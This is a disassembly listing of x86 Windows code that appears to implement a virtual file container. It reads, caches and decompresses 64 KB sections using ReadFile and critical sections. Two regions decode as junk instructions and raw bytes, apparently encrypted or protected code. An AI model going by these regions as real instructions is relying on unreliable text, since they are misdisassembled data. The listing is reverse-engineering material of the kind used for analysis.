push [ebp+arg_0]
call ds:dword_4E66FC ;; GetFileInformationByHandle
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_4]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx+24h], eax
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4D593F
; ---------------------------------------------------------------------------
loc_4D5916: ; CODE XREF: sub_4D5858+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5921
jmp short loc_4D593D
sub_4D5858 endp
; =============== S U B R O U T I N E =======================================
sub_4D5921 proc near ; CODE XREF: sub_4D5858+C2�p
; DATA XREF: _5:004E33A0�o
mov eax, ds:dword_4E68E4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_4D593C
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D593C: ; CODE XREF: sub_4D5921+C�j
retn
sub_4D5921 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5858
loc_4D593D: ; CODE XREF: sub_4D5858+5C�j
; sub_4D5858+C7�j
xor eax, eax
loc_4D593F: ; CODE XREF: sub_4D5858+BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4D5858
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5950 proc near ; CODE XREF: _4:004DF74C�p _4:004DF788�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004D59FD SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33A8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E68E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D5996
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D599A
; ---------------------------------------------------------------------------
loc_4D5996: ; CODE XREF: sub_4D5950+31�j
and [ebp+var_24], 0
loc_4D599A: ; CODE XREF: sub_4D5950+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4D59FD
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D59D6
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D59FF
; ---------------------------------------------------------------------------
loc_4D59D6: ; CODE XREF: sub_4D5950+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D59E1
jmp short loc_4D59FD
sub_4D5950 endp
; =============== S U B R O U T I N E =======================================
sub_4D59E1 proc near ; CODE XREF: sub_4D5950+8A�p
; DATA XREF: _5:004E33B0�o
mov eax, ds:dword_4E68E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4D59FC
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D59FC: ; CODE XREF: sub_4D59E1+C�j
retn
sub_4D59E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5950
loc_4D59FD: ; CODE XREF: sub_4D5950+50�j
; sub_4D5950+8F�j
xor eax, eax
loc_4D59FF: ; CODE XREF: sub_4D5950+84�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4D5950
; ---------------------------------------------------------------------------
loc_4D5A10: ; CODE XREF: sub_4D5C5C+2F1�p
; sub_4D6177+1CF�p
push ebp
mov ebp, esp
sub esp, 0ECh
push ebx
push esi
push edi
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-10h], eax
mov eax, ds:dword_4E68F8
mov [ebp-4], eax
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-8], eax
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz loc_4D5AD8
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jnz short loc_4D5AD8
mov eax, [ebp-8]
mov ecx, [ebp+0Ch]
sub ecx, [eax+4]
mov [ebp-14h], ecx
mov eax, [ebp-14h]
xor edx, edx
push 8
pop ecx
div ecx
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0
jz short loc_4D5A93
mov eax, [ebp+0Ch]
sub eax, [ebp-18h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
add eax, [ebp-18h]
mov [ebp-10h], eax
mov eax, [ebp-4]
add eax, [ebp-18h]
mov [ebp-4], eax
loc_4D5A93: ; CODE XREF: _4:004D5A76�j
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
test edx, edx
jz short loc_4D5AB8
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
push 8
pop eax
sub eax, edx
mov ecx, [ebp-10h]
add ecx, eax
mov [ebp-10h], ecx
loc_4D5AB8: ; CODE XREF: _4:004D5A9F�j
mov eax, [ebp+8]
mov ecx, [ebp-10h]
add ecx, [eax+4]
mov eax, [ebp-8]
cmp ecx, [eax+8]
jbe short loc_4D5AD8
mov eax, [ebp-8]
mov ecx, [ebp+8]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp-10h], eax
loc_4D5AD8: ; CODE XREF: _4:004D5A46�j _4:004D5A57�j ...
push 0
push 0
push dword ptr [ebp-0Ch]
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4E6788 ;; SetFilePointer
cmp eax, [ebp-0Ch]
jz short loc_4D5AF7
xor eax, eax
jmp loc_4D5C55
; ---------------------------------------------------------------------------
loc_4D5AF7: ; CODE XREF: _4:004D5AEE�j
push 0
push dword ptr [ebp+14h]
push dword ptr [ebp-10h]
push ds:dword_4E68F8
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4E677C ;; ReadFile
test eax, eax
jnz short loc_4D5B1C
xor eax, eax
jmp loc_4D5C55
; ---------------------------------------------------------------------------
loc_4D5B1C: ; CODE XREF: _4:004D5B13�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp-10h]
jz short loc_4D5B2D
xor eax, eax
jmp loc_4D5C55
; ---------------------------------------------------------------------------
loc_4D5B2D: ; CODE XREF: _4:004D5B24�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz loc_4D5C3C
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 10h
jnz short loc_4D5BA9
push offset dword_460000
call sub_4D2B7E ; CODE XREF: _4:loc_4D5B5B�j
sub eax, 7424E45Ah
loc_4D5B5B: ; CODE XREF: _4:004D5B7F�j
db 3Eh
jle short near ptr loc_4D5B51+3
cmpsb
push edi
fisttp dword ptr [edx+esi*4+61h]
clc
lds ebp, [ecx-26h]
db 2Eh ; CODE XREF: _4:loc_4D5B99�j
icebp
and eax, 7EFC9E45h
dec edi
jmp short loc_4D5B99
; ---------------------------------------------------------------------------
and [ebp+5Eh], eax
icebp
movsd
add bh, [ecx]
test [edx-3ACDB025h], dl
loopne loc_4D5B5B
test [edx+20AB1348h], ah
retn 1A2Fh
; ---------------------------------------------------------------------------
dw 6D61h
dd 0A31D6C36h, 90A16E44h, 0E2FDF0E3h
; ---------------------------------------------------------------------------
cmc
loc_4D5B99: ; CODE XREF: _4:004D5B70�j
jmp short near ptr loc_4D5B68+1
; ---------------------------------------------------------------------------
db 0C1h
db 2 dup(90h)
dw 0C033h
dd 0EE75C085h, 93E9h
db 0
; ---------------------------------------------------------------------------
loc_4D5BA9: ; CODE XREF: _4:004D5B4A�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz short loc_4D5C32
push 120000h
call sub_4D2B7E
mov esp, 0E59375A9h
lodsd
punpckhwd mm7, mm4
mov bl, 0AEh
xchg eax, edx
enter 493Dh, 20h
add esi, esi
xchg dh, [ebx-683002FDh]
adc [edi-1401F021h], ebx
mov dl, 34h
; ---------------------------------------------------------------------------
db 8Ch, 0F5h, 65h
dd 975D2033h, 0B1BE20AAh, 97A380A4h, 9FC19C8Fh, 2DDFCC3h
dd 0E1EECB75h, 9276A8BBh, 680CACDAh, 31B9E518h, 0ED0915C7h
dd 0DA20F7ABh, 0DB497247h, 758264EEh, 9E554C68h, 0DE8DD8CBh
dd 0CE190CFFh, 0A5B28F65h, 0C0339090h, 0EE75C085h
; ---------------------------------------------------------------------------
jmp short loc_4D5C3C
; ---------------------------------------------------------------------------
loc_4D5C32: ; CODE XREF: _4:004D5BB5�j
mov ecx, 0EF000014h
call sub_4DD342
loc_4D5C3C: ; CODE XREF: _4:004D5B38�j _4:004D5C30�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp+10h]
jnb short loc_4D5C4A
xor eax, eax
jmp short loc_4D5C55
; ---------------------------------------------------------------------------
loc_4D5C4A: ; CODE XREF: _4:004D5C44�j
mov eax, [ebp+14h]
mov ecx, [ebp+10h]
mov [eax], ecx
mov eax, [ebp-4]
loc_4D5C55: ; CODE XREF: _4:004D5AF2�j _4:004D5B17�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5C5C proc near ; CODE XREF: sub_4D600B+30�p
; sub_4D600B+EB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D5EAD SIZE 0000015E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33B8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4E6908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
mov [ebp+var_24], eax
and [ebp+var_28], 0
and [ebp+var_40], 0
jmp short loc_4D5CB0
; ---------------------------------------------------------------------------
loc_4D5CA9: ; CODE XREF: sub_4D5C5C:loc_4D5CED�j
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_40], eax
loc_4D5CB0: ; CODE XREF: sub_4D5C5C+4B�j
cmp [ebp+var_40], 3
jnb short loc_4D5CEF
mov eax, [ebp+var_40]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_4E5B7C[eax]
cmp eax, [ecx]
jnz short loc_4D5CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:dword_4E5B78[eax]
cmp eax, [ebp+arg_4]
jnz short loc_4D5CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:off_4E5B80[eax]
mov eax, [eax]
jmp loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5CED: ; CODE XREF: sub_4D5C5C+6B�j
; sub_4D5C5C+7C�j
jmp short loc_4D5CA9
; ---------------------------------------------------------------------------
loc_4D5CEF: ; CODE XREF: sub_4D5C5C+58�j
lea eax, [ebp+var_48]
push eax
call ds:dword_4E672C ;; GetSystemTimeAsFileTime
and [ebp+var_4C], 0
jmp short loc_4D5D06
; ---------------------------------------------------------------------------
loc_4D5CFF: ; CODE XREF: sub_4D5C5C:loc_4D5D4D�j
mov eax, [ebp+var_4C]
inc eax
mov [ebp+var_4C], eax
loc_4D5D06: ; CODE XREF: sub_4D5C5C+A1�j
cmp [ebp+var_4C], 3
jnb short loc_4D5D4F
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4E5B70
mov [ebp+var_74], eax
mov eax, [ebp+var_74]
mov ecx, [ebp+var_44]
cmp ecx, [eax+4]
jl short loc_4D5D4D
jg short loc_4D5D31
mov eax, [ebp+var_74]
mov ecx, [ebp+var_48]
cmp ecx, [eax]
jbe short loc_4D5D4D
loc_4D5D31: ; CODE XREF: sub_4D5C5C+C9�j
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4E5B70
mov ecx, [eax]
mov [ebp+var_48], ecx
mov eax, [eax+4]
mov [ebp+var_44], eax
mov eax, [ebp+var_4C]
mov [ebp+var_28], eax
loc_4D5D4D: ; CODE XREF: sub_4D5C5C+C7�j
; sub_4D5C5C+D3�j
jmp short loc_4D5CFF
; ---------------------------------------------------------------------------
loc_4D5D4F: ; CODE XREF: sub_4D5C5C+AE�j
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4E5B78[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4E5B7C[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4E5B70
and dword ptr [eax], 0
and dword ptr [eax+4], 0
mov eax, [ebp+var_28]
imul eax, 18h
mov eax, ds:off_4E5B80[eax]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
cmp dword ptr [ecx+eax+8], 0
jnz loc_4D5EAD
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_54], eax
and [ebp+var_50], 0
and [ebp+var_4], 0
mov eax, [ebp+var_54]
shl eax, 2
push eax
call sub_4DD35A
pop ecx
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
mov [ebp+var_50], eax
and [ebp+var_58], 0
mov eax, [ebp+var_54]
shl eax, 2
mov ecx, [ebp+var_34]
mov ecx, [ecx+4]
sub ecx, eax
mov [ebp+var_5C], ecx
push 0
push 0
push [ebp+var_5C]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4E6788 ;; SetFilePointer
cmp eax, [ebp+var_5C]
jz short loc_4D5E1B
push 0FFFFFFFFh
and [ebp+var_78], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_78]
jmp loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5E1B: ; CODE XREF: sub_4D5C5C+1A4�j
push 0
lea eax, [ebp+var_58]
push eax
mov eax, [ebp+var_54]
shl eax, 2
push eax
push [ebp+var_50]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4E677C ;; ReadFile
test eax, eax
jnz short loc_4D5E54
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5E54: ; CODE XREF: sub_4D5C5C+1DD�j
mov eax, [ebp+var_54]
shl eax, 2
cmp [ebp+var_58], eax
jz short loc_4D5E78
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5E78: ; CODE XREF: sub_4D5C5C+201�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov edx, [ebp+var_50]
mov [ecx+eax+8], edx
and [ebp+var_50], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5E9D
jmp short loc_4D5EAD
sub_4D5C5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4D5E9D proc near ; CODE XREF: sub_4D5C5C+23A�p
; DATA XREF: _5:004E33C0�o
mov eax, [ebp-50h]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4DD3DD
pop ecx
retn
sub_4D5E9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5C5C
loc_4D5EAD: ; CODE XREF: sub_4D5C5C+144�j
; sub_4D5C5C+23F�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov eax, [ecx+eax+8]
mov [ebp+var_30], eax
and [ebp+var_20], 0
and [ebp+var_1C], 0
cmp [ebp+arg_4], 0
jz short loc_4D5F2D
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_60], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_60]
jb short loc_4D5F00
push ds:off_4E34F8
push 93h
push ds:off_4E34FC
call sub_4DD48C
loc_4D5F00: ; CODE XREF: sub_4D5C5C+28C�j
and [ebp+var_64], 0
jmp short loc_4D5F0D
; ---------------------------------------------------------------------------
loc_4D5F06: ; CODE XREF: sub_4D5C5C+2CF�j
mov eax, [ebp+var_64]
inc eax
mov [ebp+var_64], eax
loc_4D5F0D: ; CODE XREF: sub_4D5C5C+2A8�j
mov eax, [ebp+var_64]
cmp eax, [ebp+arg_4]
jnb short loc_4D5F2D
mov eax, [ebp+var_64]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
mov ecx, [ebp+var_20]
add ecx, eax
mov [ebp+var_20], ecx
jmp short loc_4D5F06
; ---------------------------------------------------------------------------
loc_4D5F2D: ; CODE XREF: sub_4D5C5C+273�j
; sub_4D5C5C+2B7�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
push eax
mov eax, [ebp+var_34]
mov eax, [eax+4]
add eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call loc_4D5A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz short loc_4D5F62
xor eax, eax
jmp loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5F62: ; CODE XREF: sub_4D5C5C+2FD�j
mov [ebp+var_2C], 10000h
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 80000000h
test eax, eax
jnz short loc_4D5FAE
push [ebp+var_1C]
push [ebp+var_38]
lea eax, [ebp+var_2C]
push eax
push [ebp+var_3C]
call sub_4E29F3
add esp, 10h
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_4D5FAC
push [ebp+var_68]
push offset aBoxReadcompres ; ":BOX:ReadCompressedSection: decompresio"...
call sub_4DD726
pop ecx
pop ecx
xor eax, eax
jmp short loc_4D5FFA
; ---------------------------------------------------------------------------
loc_4D5FAC: ; CODE XREF: sub_4D5C5C+33B�j
jmp short loc_4D5FC5
; ---------------------------------------------------------------------------
loc_4D5FAE: ; CODE XREF: sub_4D5C5C+31D�j
mov ecx, [ebp+var_1C]
mov esi, [ebp+var_38]
mov edi, [ebp+var_3C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4D5FC5: ; CODE XREF: sub_4D5C5C:loc_4D5FAC�j
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_4]
mov ds:dword_4E5B78[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov ds:dword_4E5B7C[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4E5B70
push eax
call ds:dword_4E672C ;; GetSystemTimeAsFileTime
mov eax, [ebp+var_3C]
loc_4D5FFA: ; CODE XREF: sub_4D5C5C+8C�j
; sub_4D5C5C+1BA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D5C5C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D600B proc near ; CODE XREF: sub_4D6177+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
shr eax, 10h
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
shr eax, 10h
mov [ebp+var_4], eax
push [ebp+var_10]
push [ebp+arg_0]
call sub_4D5C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D6050
xor eax, eax
jmp loc_4D6171
; ---------------------------------------------------------------------------
loc_4D6050: ; CODE XREF: sub_4D600B+3C�j
mov eax, [ebp+var_14]
xor edx, edx
mov ecx, 10000h
div ecx
mov [ebp+var_8], edx
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4D6074
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
jmp short loc_4D607F
; ---------------------------------------------------------------------------
loc_4D6074: ; CODE XREF: sub_4D600B+5F�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
loc_4D607F: ; CODE XREF: sub_4D600B+67�j
mov ecx, [ebp+var_18]
mov esi, [ebp+var_C]
add esi, [ebp+var_8]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4D60AE
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
jmp short loc_4D60B9
; ---------------------------------------------------------------------------
loc_4D60AE: ; CODE XREF: sub_4D600B+99�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
loc_4D60B9: ; CODE XREF: sub_4D600B+A1�j
mov eax, [ebp+var_1C]
mov [ebp+var_8], eax
loc_4D60BF: ; CODE XREF: sub_4D600B+15E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jbe loc_4D616E
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
ja short loc_4D60F0
push ds:off_4E34F8
push 0BBh
push ds:off_4E34FC
call sub_4DD48C
loc_4D60F0: ; CODE XREF: sub_4D600B+CD�j
push [ebp+var_10]
push [ebp+arg_0]
call sub_4D5C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D6108
xor eax, eax
jmp short loc_4D6171
; ---------------------------------------------------------------------------
loc_4D6108: ; CODE XREF: sub_4D600B+F7�j
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_4D6120
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_20], eax
jmp short loc_4D6127
; ---------------------------------------------------------------------------
loc_4D6120: ; CODE XREF: sub_4D600B+108�j
mov [ebp+var_20], 10000h
loc_4D6127: ; CODE XREF: sub_4D600B+113�j
mov ecx, [ebp+var_20]
mov esi, [ebp+var_C]
mov edi, [ebp+arg_4]
add edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_4D6159
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_24], eax
jmp short loc_4D6160
; ---------------------------------------------------------------------------
loc_4D6159: ; CODE XREF: sub_4D600B+141�j
mov [ebp+var_24], 10000h
loc_4D6160: ; CODE XREF: sub_4D600B+14C�j
mov eax, [ebp+var_8]
add eax, [ebp+var_24]
mov [ebp+var_8], eax
jmp loc_4D60BF
; ---------------------------------------------------------------------------
loc_4D616E: ; CODE XREF: sub_4D600B+BA�j
push 1
pop eax
loc_4D6171: ; CODE XREF: sub_4D600B+40�j
; sub_4D600B+FB�j
pop edi
pop esi
leave
retn 0Ch
sub_4D600B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D6177 proc near ; CODE XREF: sub_4D494C+242�p
; sub_4D4FBF+194�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004D645D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E33C8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 3Ch
push ebx
push esi
push edi
cmp [ebp+arg_14], 0
jnz short loc_4D61A8
lea eax, [ebp+var_1C]
mov [ebp+arg_14], eax
loc_4D61A8: ; CODE XREF: sub_4D6177+29�j
mov eax, ds:dword_4E68E4
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz short loc_4D61C9
mov eax, [ebp+var_3C]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_40], 1
jmp short loc_4D61CD
; ---------------------------------------------------------------------------
loc_4D61C9: ; CODE XREF: sub_4D6177+3D�j
and [ebp+var_40], 0
loc_4D61CD: ; CODE XREF: sub_4D6177+50�j
movzx eax, [ebp+var_40]
test eax, eax
jz loc_4D645D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_4D6436
cmp [ebp+arg_10], 0
jz short loc_4D6207
mov eax, [ebp+arg_10]
mov dword ptr [eax], 3E5h
loc_4D6207: ; CODE XREF: sub_4D6177+85�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4D6254
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E677C ;; ReadFile
mov ecx, [ebp+arg_14]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp loc_4D645F
; ---------------------------------------------------------------------------
loc_4D6254: ; CODE XREF: sub_4D6177+A5�j
cmp [ebp+arg_10], 0
jz short loc_4D6281
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_4D6281
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_20]
mov ecx, [ecx+4]
mov [eax+0Ch], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+8]
mov [eax+4], ecx
loc_4D6281: ; CODE XREF: sub_4D6177+E1�j
; sub_4D6177+F0�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov eax, [eax+4]
add eax, [ebp+arg_8]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4D62A7
mov eax, [ebp+var_30]
mov ecx, [ebp+var_20]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp+var_28], eax
loc_4D62A7: ; CODE XREF: sub_4D6177+11F�j
cmp [ebp+arg_C], 0
jnz short loc_4D62B3
lea eax, [ebp+var_2C]
mov [ebp+arg_C], eax
loc_4D62B3: ; CODE XREF: sub_4D6177+134�j
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
cmp [ebp+arg_8], 0
jbe loc_4D63B8
cmp [ebp+var_28], 0
jbe loc_4D63B8
mov eax, [ebp+var_30]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jz short loc_4D62FE
